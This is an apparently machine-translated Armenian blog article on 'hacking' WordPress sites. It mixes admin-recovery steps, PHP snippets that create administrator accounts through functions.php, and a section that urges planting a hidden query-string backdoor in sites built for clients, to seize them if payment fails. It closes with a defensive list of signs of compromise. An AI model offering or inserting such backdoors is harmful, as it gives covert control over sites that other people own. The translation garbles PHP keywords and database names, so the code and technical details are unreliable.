Ինչպե՞ս թալանել WordPress կայքում ՝ ամբողջական ուղեցույցը

Ինչպես թալանել WordPress- ի կայք ՝ ամբողջական ուղեցույցը


Մենք չենք դատապարտում, հաստատում կամ խրախուսում ենք ապօրինի կամ չարամիտ վարքագիծ: Այս հոդվածի նպատակն է բացատրել, թե ինչպես կարելի է խաբել կամ վերականգնել մուտք դեպի WordPress կայք, որը պատկանում է ձեզ, կամ որ դուք իրավունք ունեք խմբագրելու, կառավարելու և մուտք գործելու իրավունք: Ինչ էլ որ անես, դու դա անում ես ինքնուրույն. Մենք պատասխանատու չենք ձեր գործողությունների համար: Այս ուղեցույցը ծառայում է միայն կրթական նպատակներով.

Նկարագրված մեթոդները կօգնեն ձեզ վերականգնել կայք մուտք գործելը, նույնիսկ եթե այլևս հաշիվ չունեք, բայց կպահանջի որոշ տեղեկություններ կայքի մասին, և դրանք չեն օգնի ձեզ խորտակել WordPress- ի պատահական ցանկացած տեղադրում.

Այս ուղեցույցում մենք պատրաստ ենք ձեզ ցույց տալ.

  • Ինչպե՞ս թալանել WordPress կայքում
  • Ինչպես ստեղծել հետևի սկիզբ WordPress- ում
  • Ինչպես ստեղծել նոր օգտվողի հաշիվ FTP- ի միջոցով
  • 10 նշան ձեր WordPress կայքը թալանված է

Ինչպես թալանել WordPress- ի կայք ՝ ամբողջական ուղեցույցը

Իրավիճակներ, որոնցում կարող եք ինքներդ ձեզ օգնել

Եթե ​​դուք հետևյալ իրավիճակներից եք, մեր մեթոդները կօգնեն ձեզ վերականգնել մուտքը.

  • մոռացե՞լ եք օգտվողի անունը կամ էլփոստի հասցեն
  • գաղտնաբառի վերափոխման տարբերակը չի գործում հոստինգի սերվերի վրա
  • վերականգնել գաղտնաբառի էլ. փոստերը չեն ստացվում
  • Դուք այլևս մուտք չեք ունեցել հաշվի էլփոստի հասցեին
  • դուք գիտեք օգտվողի անունը և գաղտնաբառը, բայց համադրությունը պարզապես չի գործում

Ստորև նկարագրված մեթոդներից օգտվելու համար ձեզ հարկ կլինի հետևյալներից միայն մեկը:

  • FTP մուտք դեպի սերվեր, կամ
  • cPanel մուտք դեպի սերվեր, կամ
  • մուտք դեպի MySQL տվյալների շտեմարան և հեռակա կարգով դրա միացման հնարավորությունը

Մեթոդ # 1 – MySQL եղանակը

Օգտագործեք այս մեթոդը ՝ գոյություն ունեցող օգտագործողի գաղտնաբառ (կամ անհրաժեշտության դեպքում օգտագործողի անունը) փոխելու կամ նոր հաշիվ ստեղծելու համար: Ձեզ հարկ կլինի cPanel մուտք կամ MySQL մուտք ուղղել կայքի տվյալների շտեմարան. Սկսենք ՝ փոխելով առկա օգտվողի գաղտնաբառը.

Եթե ​​դուք օգտագործում եք cPanel, մուտք եք գործում (cPanel- ին միշտ կարելի է մուտք գործել միջոցով https://yoursite.com:2083 հղում), գտնել և բացել phpMyAdmin. Տվյալների բազաների և աղյուսակների ցանկը ձախ կողմում է. Դուք փնտրում եք սեղան, որն ավարտվում է _ օգտագործողները. Դա հավանաբար կլինի wp_users, բայց եթե սերվերում տեղադրված եք մեկից ավելի WordPress կայք, ապա պետք է ճիշտը գտնեք.

Tableիշտ սեղանը կունենա այն օգտվողը, որը ցանկանում եք խմբագրել դրա մեջ: Հետևե՛ք նույն ընթացակարգին, եթե միանում եք MySQL- ին, ինչպես օրինակ արտաքին արտաքին հաճախորդի միջոցով SQLyog. Սեղանը և օգտագործողի իրական ձայնագրությունը տեղադրելուց հետո ժամանակն է փոխել գաղտնաբառը.

Ինչպես հավանաբար պարզել եք մինչ այժմ, գաղտնաբառը պահվում է user_pass դաշտ, hashed օգտագործելով MD5 ալգորիթմը: Բացեք առցանց MD5 գեներատոր մուտքագրեք գաղտնաբառը, որը ցանկանում եք օգտագործել և կտտացրեք «Hash». Պատճենել ստացված լարը և փոխարինել բնօրինակը գաղտնաբառը դրանով. PhpMyAdmin- ում կարող եք խմբագրել դաշտը `կրկնակի կտտացնելով դրան: Ընթացակարգը նման է MySQL- ի մյուս հաճախորդներին: Պահպանեք փոփոխությունները և մուտք գործեք WordPress ՝ ձեր նոր գաղտնաբառով.

WP օգտվողների սեղան

Անունները, հեշդ գաղտնաբառերը և էլ.փոստերը պահվում են այդ հասցեում wp_users տվյալների բազայի աղյուսակ

Դեռևս թիվ 1 մեթոդով `ստեղծելով նոր օգտվող

Նոր օգտագործողի ստեղծումը մի փոքր ավելի բարդ է, բայց դեռ կառավարելի է մեկ րոպեից պակաս ժամանակահատվածում. Ստեղծեք նոր ռեկորդ օգտվողների աղյուսակում և բնակեցրեք ՝ user_login, user_pass (հեշ: վերը նկարագրված MD5 գործառույթի օգտագործմամբ) և user_email: Բոլոր մյուս դաշտերը կարող են դատարկ մնալ; նրանք նշանակություն չունեն: Պահպանեք նոր գրառումը: Պահպանվելուց հետո MySQL- ն կտա այն եզակի ID: Դա համարն է նույնականացման դաշտում: Հիշիր դա.

Հիմա գնացեք _ուսերմետա սեղան: Հիշիր, սեղանի նախածանցը պետք է լինի նույնը, ինչ օգտվողների համար. Օրինակ wp_users և wp_usersmeta. Եթե ​​նախածանցը նույնը չէ, դուք խմբագրում եք սխալ աղյուսակը (մի քանի այլ WP տեղադրում) և նոր հաշիվը չի աշխատի: Մենք կստեղծենք երկու նոր գրառում: Անտեսել umeta_id երկուսի համար դաշտ: Սահմանել օգտագործողի այ - Դի դաշտ դեպի այն նոր արժեքը, որը դուք պարզապես հիշել եք (օգտագործողների աղյուսակում առկա նոր ID արժեքը): Առաջին ռեկորդի համար meta_key դեպի wpct_user_level և meta_value դեպի 10-ը. Երկրորդի համար meta_key դեպի wpct_cap հնարավորությունները և meta_value դեպի a: 1: {s: 13: "administrator"; b: 1;}. Պահպանեք երկուսն էլ: Դուք ավարտվել եք – մուտք!

Մեթոդ # 2 – ֆունկցիաների.php եղանակը

Այս մոտեցումը կարող է օգտագործվել կա՛մ գործառույթները.php- ը cPanel- ի միջոցով խմբագրելու միջոցով, կա՛մ FTP հաճախորդի միջոցով դա անելու համար: Եթե ​​օգտագործում եք cPanel- ը, գտեք File Manager- ը և բացեք այն. Նախ, մենք պետք է գտնենք ակտիվ թեմաների պանակ.

Գնալ public_html / wp_content / թեմաներ թղթապանակ Եթե ​​դուք անմիջապես տեսնում եք ձեր թեման և գիտեք, թե որն է այն, հիանալի է: Բացեք դրա թղթապանակը և սկսեք խմբագրել գործառույթները.php. Եթե ​​ոչ, բացեք կայքը, կտտացրեք աջ ցանկացած վայրում, ընտրեք «Դիտել աղբյուրը»: Այնուհետև սեղմեք Ctrl + F և սկսեք տպել / թեմաներ / շուտով դուք կցուցադրեք բազմաթիվ URL- ներ, և դուք կճանաչեք ակտիվ թեմայի թղթապանակը.

Գտեք այն ֆայլի կառուցվածքում, բացեք և սկսեք խմբագրել գործառույթները.php. Ֆայլի վերջում պատճենեք / տեղադրեք հետևյալ ծածկագիրը. Մտածեք փակումը ?> PHP- ի պիտակները, եթե դրանք ունեք. Նրանք պետք է լինեն վերջին գծում: Այսպիսով, տեղադրեք ծածկագիրը դրանցից առաջ.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

եթե (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (զանգված ('ID' => $ user_id, 'մականուն' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ user-> set_role ('ադմինիստրատոր');
}

Փոփոխեք կոդի միայն առաջին երկու տողերը `ձեր նոր հաշիվը արտացոլելու համար. Եթե ​​WP- ում արդեն կա այդ էլփոստով օգտվող, ապա նոր հաշիվ չի ստեղծվի, համոզվեք, որ այն նոր է. Փոխեք նաև գաղտնաբառը. Մի՛ թալանվեք սկրիպտների գրառումներից: Ֆայլը պարզապես ձեր կայքը բացելուց հետո ծածկագիրը գործարկվելու է, կստեղծվի նոր հաշիվ, որը ստեղծվել է ադմինիստրատորի արտոնություններով և դուք կկարողանաք մուտք գործել դրա հետ.

Դա անելուց հետո հիշեք, որ ջնջեք ծածկագիրը գործառույթները.php.

Հակերության այլ մեթոդներ

Իմանալով FTP, cPanel կամ MySQL գաղտնաբառ, դուք ապացուցում եք, որ դուք ունեք սերվերի օրինական մուտքի իրավունք և, հետևաբար, պետք է նաև ունենաք մուտք WordPress- ի տեղադրում (ներ) ին: Եթե ​​այդ հաշիվներից որևէ մեկը չունեք, ուրեմն ամենևին էլ լավ չեք (թաքցնում եք այլ մարդկանց կայքեր), և դա հաճելի չէ!

Խնդրում ենք հիշել, որ ցանկացած համակարգչի, կայքերի կամ սերվերների վրա չթույլատրված մուտք ունենալը լուրջ հանցագործություն է և անհապաղ վերաբերվում է շատ երկրներում.

Եթե ​​վախենում եք, որ ձեր WordPress կայքը կարող է թալանվել, ստուգեք այս էջը անվճար WordPress անվտանգության սկաներով: Եթե ​​ժամանակ չունեք ձեր բլոգը հիմնելու համար, եկեք դա անենք ձեզ համար.

Ինչպես ստեղծել հետևի սկիզբ WordPress- ում

Երբ առջևի դուռը փակ է, հնարավոր է փորձեք հետևի դուռը: Սա կարող է թվալ որպես կայքը մուտքագրելու համար կոդ օգտագործելու չարամիտ միջոց ՝ առանց դրա մուտք ունենալու, բայց իրականում լինում են ժամանակներ, երբ հարկ է լինում վերահսկել քո սեփական կայքը, եթե ինչ-որ մեկը գողացել է այն.

Եթե ​​այն ստեղծում է վեբ կայքեր այլ մարդկանց համար, ինչ-որ բան ես անում, վաղ թե ուշ կգտնվի մի հաճախորդ, որը կհրաժարվի վճարել քեզ քո աշխատանքի դիմաց: հաճախորդ, որը կջնջի ձեր մուտքի տեղեկատվությունը և ստանձնի ձեր արածի վերահսկողությունը: Երբեմն, դա բավարար կլինի FTP- ի միջոցով նոր օգտվող ստեղծելու կամ գաղտնաբառի վերափոխման համար: Երբ դա բավարար չէ, գուցե ցանկանաք թալանել ձեր ճանապարհը կամ հետին մուտք ստեղծել ձեր ադմինիստրատորի էջերից.

Բայց եթե որոշեցիք մի փոքր կտոր կոդ թաքցնել ձեր WordPress միջավայրում, միգուցե ձեզ փրկի որոշակի արժանապատվություն և ձեռք բերել WordPress կայք ՝ ադմինիստրատորի արտոնություններով. Եվ ահա, որտեղ սկսվում են խաղերը.

Անկախ նրանից, թե քանի անգամ է այս գողը ջնջում ձեր տեղեկատվությունը կամ վերականգնում կրկնօրինակում այն ​​սերվերի համար, որը նա հավանաբար ունի, կա հնարավորություն, որ նա ոչինչ չգիտի բակի մուտքի մասի մասին: Եթե ​​նա դա արեց, նա հավանաբար կարիք չէր ունենա նաև ձեր օգնությունը WordPress- ի տեղադրման հարցում, ճիշտ է?

Ստեղծեք հետևի մաս:

Լավ, բավական է խոսակցությունից. ահա մի կտոր կոդ, որը ձեզ հարկավոր է աշխատանքն իրականացնելու համար.

  1. Բացեք գործառույթները.php ֆայլը
  2. Պատճենեք / տեղադրեք հետևյալ ծածկագիրը.
  3. add_action ('wp_head', 'wploop_backdoor');
    գործառույթ wploop_backdoor ()
    Եթե ​​($ _GET ['հետևի մաս'] == 'թակոց') {
    պահանջել ('wp-ընդգրկում / գրանցում :php');
    Եթե ​​(! Username_exists ('username')) {
    $ user_id = wp_create_user ('name', 'pass');
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('ադմինիստրատոր');
    }
    }
    }
    ?>
  4. Պահպանել փոփոխությունները

Եթե ​​ծածկագիրը թողնում եք այնպես, ինչպես կա, այն ամենը, ինչ դուք պետք է անեք, որպեսզի կայքում ստեղծեք նոր կառավարիչ, այցն է http://www.yourdomain.com/?backdoor=knockknock

Էջը բեռնվելուց հետո ձեր նոր անունն է “Անուն” և գաղտնաբառ «Անցնել».

Իհարկե, Դուք կարող եք դա փոխել կոդով վերևում ՝ փոխելով «անունը» և «անցնել» ինչ ուզում ես: Կարող եք նաև փոխել ձեր հետևի դռան կապը `փոխելով« հետևի մաս »և (կամ)« թակոց »բոլոր այն բանի համար, ինչով ես եկել:.

Փորձեք գործառույթը. Ոչ միայն զվարճալի է, այլև այն իսկապես կարող է օգնել ձեզ ապագայում ինչ-որ պահի, երբ պատրաստվում եք վեբ կայք ստեղծել մեկի համար, որին ամբողջությամբ չեք կարող վստահել: Դուք նաև պետք է մակարդակ բարձրացնեք ձեր WordPress- ի և բլոգավարման հմտությունները.

Ինչպես ստեղծել նոր օգտվողի հաշիվ FTP- ի միջոցով

WordPress- ում նոր օգտվողի հաշիվներ ստեղծելը շատ հեշտ է: Որպես ադմին, դուք պետք է նավարկեք Օգտագործողների ադմինիստրատորի էջին որտեղ դուք կարող եք ստեղծել նոր հաշիվ ցանկացած օգտագործողի դերի համար: Դա կարելի է անել մի քանի վայրկյանում, և նորաստեղծ օգտագործողը կարող է անմիջապես մուտք գործել տվյալ օգտվողի անունով և գաղտնաբառով.

Բայց ի՞նչ է պատահում, եթե կորցնում ես մուտք դեպի WordPress- ի ադմինիստրատոր: Իրերը կարող են մի փոքր ավելի բարդ լինել, բայց մի անհանգստացեք. Մենք ձեզ համար ունենք մի գործառույթ, որը կարող է փրկել ձեր ադմինիստրատորի կյանքը.

Անկախ նրանից, թե մեկ այլ ադմինիստրատոր ջնջե՞լ է ձեր հաշիվը, արդյոք սխալմամբ ջնջե՞լ եք բոլոր օգտվողներին տվյալների շտեմարանից, օգտագործել եք անսարք plugin կամ խարդախացել եք, միևնույն է, դուք դեռ կարող եք վեր հսկել: Երբեմն հնարավոր է կարողանաք մուտք գործել միայն ձեր FTP սերվերը, մինչդեռ HTTP- ը դուրս կգա ձեր հնարավորությունից, և ձեզ հարկավոր է ստեղծել նոր կառավարիչ: Թեև դա կարող է լինել հազվադեպ դեպք, հետևյալ գործառույթը կփրկի ձեզ.

WordPress- ի ադմինիստրատիվ միջավայրից դուրս նոր հաշիվ ստեղծելու համար, Ձեզ անհրաժեշտ կլինի FTP մուտք դեպի ձեր կայք: Որպես ադմինիստրատոր, դուք պետք է ունենաք բոլոր անհրաժեշտ տեղեկությունները ձեր սերվերին մուտք գործելու համար և կարող եք արագ ստեղծել նոր հաշիվ ՝ ստեղծելով ձեր նոր թեմայի նոր գործառույթ.

Ստեղծեք նոր օգտվողի հաշիվ FTP- ի միջոցով.

  1. Բացեք FTP հաճախորդը և միացեք ձեր հաշվին
  2. Նավարկեք wp- պարունակության / թեմաների վրա
  3. Բացեք ձեր օգտագործած թեմայի թղթապանակը
  4. Փնտրեք գործառույթները.php ֆայլը և խմբագրեք այն
  5. Պատճենեք և տեղադրեք հետևյալ գործառույթը.
  6. գործառույթ admin_account ()
    $ user = 'Մականուն';
    $ pass = 'գաղտնաբառ';
    $ email = '[email protected]';
    եթե (! username_exists ($ user) &&! email_exists ($ էլփոստ)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('ադմինիստրատոր');
    }
    add_action ('նախաձեռնել', 'admin_account');
    
  7. Փոխեք օգտվողի անունը, գաղտնաբառը և էլ.փոստը յուրօրինակ մի բանի համար
  8. Պահպանել փոփոխությունները

Համոզվեք, որ գործառույթի սահմանած օգտվողի անունը, գաղտնաբառը և էլփոստի հասցեն եզակի են կամ հակառակ դեպքում գործառույթը չի գործի ինչպես հարկն է: Փոփոխությունները պահպանելուց հետո դուք կատարել եք և կարող եք նավարկվել դեպի WP մուտքի վահանակ: Նոր հաշիվ մուտք գործելու համար օգտագործեք նոր տեղեկատվություն և հաշիվը հաստատելուց հետո կարող եք ֆունկցիան ջնջել գործառույթներից :php ֆայլից.

Վերևում ցուցադրված գործառույթը ստեղծում է ադմինիստրատիվ հաշիվ, բայց հեշտությամբ կարող եք փոփոխել այն ՝ ցանկացած այլ օգտագործողի դուստր հաշիվ ստեղծելու համար: Պարզապես փոխել դերը 8-ումթ շարքը ծածկագրի համար `ձեր ստեղծած խմբագրին, հեղինակին, ներդրողին, բաժանորդին կամ օգտագործողի ցանկացած այլ դեր.

Դժբախտաբար, եթե կորցրել եք ձեր ադմինիստրատորի հաշիվը, ապա կորցրել եք նաև այդ օգտվողի անվան տակ գրված բոլոր հաղորդագրությունները: Ահա թե ինչու դուք միշտ պետք է պահեք պահուստ, որը հեշտությամբ կարող եք վերցնել: Եթե ​​դա կարդում եք ձեր admin հաշիվն ունենալիս, վերցրեք սա որպես հիշեցում `անմիջապես կրկնօրինակում ստեղծելու համար և էջանշեք այս հոդվածը հենց այն դեպքում, երբ ապագայում ձեզ հարկավոր է ստեղծել հաշիվ WordPress- ից դուրս.

10 նշան ձեր WordPress կայքը թալանված է

WordPress- ը բլոգերների հսկայական հարթակ է: Կան միլիոնավոր օգտվողներ, և թվում է, որ այդ թիվը արագորեն աճում է ամեն օր: Մարդիկ նույնիսկ հակված են փոխանցել բովանդակության կառավարման այլ համակարգերում ստեղծված իրենց կայքերը այս բաց կոդով համակարգը ավելի հաճախ, քան կարծում եք: Եվ, չնայած որ դա լավ է, սա նշանակում է հաքերները WordPress- ը կդնեն նաև մեկ-մեկ տեղում `փորձելով ներխուժել պատահական կայքեր.

Սովորաբար, եթե դուք խարդախվում եք, այդ մասին անմիջապես կիմանաք: Ձեր կայքը կդառնա անհասանելի; դուք չեք կարողանա մուտք գործել, և երբեմն հակեր է նույնիսկ թողնում հաղորդագրություն առաջին էջում: Բայց ավելի հաճախ, քան ոչ, գուցե նույնիսկ չնկատեք, որ ինչ-որ բան փոխվել է. Հոդվածի այս մասում մենք պատրաստվում ենք ձեզ ցույց տալ մի քանի նշաններ, որոնք կարող են ցույց տալ, որ ձեր WordPress կայքը թալանվել է և խնդրի մի քանի լուծումներ.

1. Անհաջող մուտք

Այս նշանը բավականին ակնհայտ է: Եթե ​​որոշ ժամանակ օգտագործե՞լ եք օգտվողի անունը և գաղտնաբառի համադրությունը ՝ առանց որևէ խնդիր երբևէ զգալու, կարող եք կասկածել, եթե հանկարծ WordPress- ը չի ճանաչում ձեր հաշիվը. Եթե ​​հակերը ստիպված է մուտք գործել ձեր կայք, հավանականությունը մեծ է, որ նա արագ փոխի ձեր ադմինիստրատորի արտոնությունները.

Գուցե նա ստիպված է փոխել ձեր գաղտնաբառը կամ ամբողջությամբ ջնջել ձեր հաշիվը: Նախքան WordPress- ի առաջին անգամից հետո խուճապ սկսելը ձեզ սխալ օգտվողի անուն / գաղտնաբառ է տալիս, խնդրում ենք հաշվի առնել այն փաստը, որ գուցե սխալ համադրություն եք մտել կամ գուցե միացրել եք գլխարկների կողպման կոճակը:.

ԼուծումՓորձեք վերականգնել գաղտնաբառը էլփոստով կամ այլ հաշիվ օգտագործեք ՝ մուտք գործելու համար: Որպեսզի համոզվեք, որ մուտքը մնում է անվտանգ, խորհուրդ ենք տալիս տեղադրել Մուտք գործել Ninja հավելված WordPress- ի համար.

2. Վնասակար բովանդակությունը ավելացվում է ձեր կայքում

Կայքը պարունակում է չարամիտ նախազգուշացում

Եթե ​​սկսում եք ձեր կայքում անծանոթ բովանդակություն նկատել, գուցե սկսեք անհանգստանալ: Երբ նրանք հնարավորություն են ստանում մուտք ունենալ ձեր ադմինիստրատորի տարածք, հաքերները կկարողանան փոխել ձեր հիմնականը և թե ձեր թեման, թե plugin ֆայլերը. Դա նշանակում է, որ նրանք ստիպված են փոխել իրենց ուզածը.

Թեև որոշ հակերներ կտրուկ փոփոխելու են ձեր կայքի տեսքը և միգուցե նույնիսկ կասեն, որ դուք կեղծել եք, մյուսները շատ ավելի նուրբ կլինեն դրա մասին.

ԼուծումՓորձեք թաքնված բովանդակություն որոնել կայքի կոդով: Կարող են լինել հղումներ դեպի վնասակար կայքերի հակերներ, որոնք տնկվել են ձեր կայքի ներքևի մասում, կամ նրանք կարող են տեղադրել տեղադրված թռուցիկներ, որոնք պարբերաբար կբացվեն ձեր հաճախորդների համար: Օգտագործեք Security Ninja ՝ ձեր կայքը սկանավորելու կամ ձեր կայքի շարունակաբար վերահսկելու համար նման խնդիրների համար.

3. Կասկածելի այցեր

Եթե ​​չեք հետևում ձեր վեբ կայքին, ապա պետք է անմիջապես սկսեք դա անել: Կատարման մի պարզ միջոց `Google Analytics- ի օգտագործումն է, որը, ի թիվս բազմաթիվ այլ հատկությունների, կարող է ասել, թե քանի այց եք ստանում և որտեղից են գալիս այդ այցերը: Որոշ ժամանակ անց դուք կծանոթանաք ձեր կայքին: Դա նշանակում է, որ դուք կիմանաք, թե որտեղից են այցելությունները, դուք կիմանաք, թե երբ եք մեկնարկում նոր արշավ և երբ կան նոր խթանման հղումներ, որոնք թողարկվում են վայրի բնության մեջ.

Բայց եթե հանկարծ նկատում եք, որ ձեր կայքը ահռելի քանակությամբ նոր այցեր է ստանում կասկածելի տիրույթից, դուք կցանկանաք հետաքննել դա հետագա, քանի որ ձեր կայքը կարող է պարզապես թալանել: Սովորաբար, այդպիսի այցերը կհանգեցնեն ցատկման 100% տոկոսադրույքին, ինչը նշանակում է, որ մուտք է եղել ընդամենը մեկ էջ: Հաքերները հաճախ կօգտագործեն ավտոմատ համակարգեր, որոնք այլ վատ կայքեր կուղեկցեն ձերն են: Անկախ նրանից, թե դա այն վատ կոդն է, որը գործարկվում է ձեր կայքում, կամ դուք դարձել եք սպամ ցանցի մի մաս, ամեն ինչ կարող է լուրջ լինել, և դուք ստիպված կլինեք ստուգել ձեր կայքը վնասակար կոդի համար.

Լուծում. Օգտագործել Google Վեբ վարպետների գործիքներ կասկածելի տիրույթներ գտնելու համար

4. Տրաֆիկի հանկարծակի անկում

Ապահով դիտում Ssite կարգավիճակը

Ի տարբերություն թալանման վերջին նշանի ՝ սա կարող է ձեզ ահազանգել, քանի որ հանկարծ այցելությունների քանակի անկում է նկատվում: Փոխանակ ձեզ նոր այցեր հղելու փոխարեն, հակեր կարող է այցեր ուղարկել ձեր կայքից հեռու. Դա կարող է պատահել, քանի որ հաքերը ձեր կայքը վերահղեց մեկ այլ կայք: Ավելի քիչ այցելուներ ստանալու մյուս պատճառն այն է, որ Google- ը սև ցուցակագրեց ձեր կայքը: Այս գործողությունը հաղորդագրություն կցուցաբերի յուրաքանչյուր օգտագործողի, ով կարող է ընտրություն կատարել ձեր կայքը չբացելու պատճառով, քանի որ այն վարակված է.

ԼուծումՕգտագործեք Google- ը Անվտանգ զննարկման կայքի կարգավիճակը ստուգելու, թե արդյոք ձեր կայքը նշված է որպես ոչ անվտանգ և ներկայումս վտանգավոր է այցելել.

5. Որոնիչների արդյունքները տարօրինակ են

Եթե ​​դուք չեք նկատել որևէ փոփոխություն ձեր կայքում, բայց պարզում եք, որ Google- ում և այլ որոնողական համակարգերում որոնման արդյունքները տարօրինակ են (ցույց տվեք տարբեր վերնագրեր և այլ մետատրոդներ), սա կարող է լինել թալանված կայքի հստակ նշան: Հակեր կարող է փոխել ձեր բովանդակությունը այնպես, որ տեսանելի լինի միայն փորձագետի համար: Դեռևս փոփոխությունը տեսանելի կլիներ որոնիչի արդյունքներում.

ԼուծումՍտուգեք ձեր կայքը Google Վեբ վարպետների գործիքներ, և ստուգեք ՝ արդյոք ձեր կայքը խելագարվել է սրա հետ անվճար առցանց գործիք.

6. Դուք չեք կարող ուղարկել / ստանալ էլ

Հակերը ձեր կայք մուտք ունենալուց հետո նա հավանաբար կցանկանա օգտագործեք ձեր սերվերը բոլորի համար սպամ տարածելու համար. Երբ պարզում եք, որ ձեր WordPress- ից չեք կարող ուղարկել կամ ստանալ նոր նամակներ, սա կարող է լինել հստակ նշան, որ դուք խաբվել եք: Կրկին ստուգեք ձեր էլ. Նամակը, ապա ստուգեք այն ձեր մատակարարի հետ, որպեսզի համոզվեք, որ սխալներ չկան.

ԼուծումՍտուգեք ձեր WordPress- ը փոստի գործառույթ այս անվճար հավելվածով.

7. Կայքը գոյություն չունի

Սերվերը չի գտնվել

Կան ժամանակներ, երբ հակերները չեն կարողացել մուտք գործել ձեր կայք ՝ չարամիտ կոդ տնկելու, օգտվողներին վերահղելու կամ ձեր էլ.փոստը օգտագործելու համար սպամի համար: Երբեմն, այն ամենը, ինչ նրանք կցանկանան անել, ձեր կայքը խորտակելն է. Հազվադեպ է, որ հակեր հաջողությամբ ջնջի ամեն ինչ ամբողջ սերվերից: Ահա թե ինչու կարևոր է, որ ձեր ֆայլերը հյուրընկալեք հայտնի հյուրընկալող ընկերությունում, որը կվերցնի անվտանգությունը, ինչպես նաև պահպանի ձեր վեբ կայքի ամենօրյա կամ գոնե շաբաթական պահուստավորումը: Լավ պրակտիկա է, որ դուք ժամանակ առ ժամանակ կատարում եք նաև ձեր սեփական կրկնօրինակը, որպեսզի կայքը արագ վերականգնվի.

ԼուծումՏեղադրեք WordPress- ում կրկնօրինակի կառավարման լավագույն հավելյալներից մեկը.

8. Կասկածելի ֆայլեր

Նման է չարամիտ բովանդակության, որը կարող է ավելացվել առկա ֆայլերին, հակեր կարող է լրացուցիչ ֆայլեր տնկել ցանկացած տեղ ձեր արմատային թղթապանակում. Լավ բան է իմանալ ձեր ճանապարհը WordPress- ի շուրջ, բայց եթե այդքան փորձառու չեք, ձեր տրամադրության տակ պետք է ունենաք անվտանգության գործիք, որը կարող է ստուգել ձեր բոլոր ֆայլերը և գործողությունները: Վերջերս մենք վերանայեցինք Security Ninja- ը, որը կատարյալ գործիք է ձեր բոլոր WordPress ֆայլերը ստուգելու համար.

ԼուծումՓորձեք որոնել այն ֆայլերը, որոնք չեն պատկանում ձեր WordPress- ի տեղադրմանը: Օգտագործեք Security Ninja ՝ ձեր կայքը կանոնավոր կերպով սկանելու համար և ինքնաբերաբար գտնեք այդ ֆայլերը: Դրանից հետո ջնջեք ֆայլերը կամ հեռացրեք չարամիտ ծածկագիրը վարակված ֆայլերից: Մի մոռացեք Core Scanner հավելվածը Security Ninja- ի համար.

9. Նոր անդամներ

Կախված ձեր կայքից, դուք կարող եք միակն եք, ով կարող է ավելացնել նոր անդամներ: Այդ դեպքում էլփոստը, որը ձեզ ասում է նոր գրանցված օգտվողների մասին, կարող է ահազանգ առաջացնել: Եթե ​​կան այլ ադմինիստրատորներ, որոնք հնարավորություն ունեն նոր անդամներ ավելացնել, նրանց հետ ստուգեք կասկածելի գործունեության մասին.

ԼուծումՓոխեք մուտքի URL- ն անվճար plugin- ով, սահմանափակեք մուտքը ձեր WordPress մուտքի էջին ՝ օգտագործելով .htpasswd ֆայլը և օգտագործեք Մուտք Ninja ՝ ձեր մուտքի ձևը ամբողջ ժամանակ պաշտպանելու համար.

10. Ստուգեք ծրագրավորված իրադարձությունները ձեր սերվերում

Երբեմն, հակերը չի կարող որևէ բան անել ձեր վեբ կայքից, երբ նրանք կգտնեն իրենց ճանապարհը: Փոխարենը, նրանք թողնելու են նախատեսված միջոցառումները ինչը կարող է վնասել ձեր կայքը ինչ-որ պահի ապագայում: Այս տեխնիկան վտանգավոր է, քանի որ հակեր կարող է սկզբում թողնել անփորձ զոհի խառնաշփոթությունը: Կարող եք վարակվել և դրա մասին ոչինչ չգիտեք.

ԼուծումՍտուգեք ձեր CRON գործերը ձեր օգտագործած սերվերի վրա և համոզվեք, որ կասկածելի պլանային խնդիրներ չկան.

Փաթաթելով

Հուսով ենք, որ այս հոդվածը կօգնի ձեզ ղեկավարել նույնիսկ ավելի անվտանգ WordPress կայքը և կօգնի ձեզ վերականգնել դրա հասանելիությունը վատ իրավիճակներում: Եւ նույնիսկ եթե ձեր կայքը մաքուր է, խնդրում ենք մի վերցրեք դա համարժեք.
Միշտ համոզվեք, որ ձեր բլոգը հնարավորինս անվտանգ է: Մենք առաջարկում ենք անվտանգության plugins WordPress- ի համար, որը կարող է ձեզ ամենաշատը խնայել: Դեռևս մի եղեք այն մեկը, ով օգտագործում է ոչ անվտանգ գաղտնաբառ և զգույշ եղեք ձեր WordPress- ի կայքում թալանելիս.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked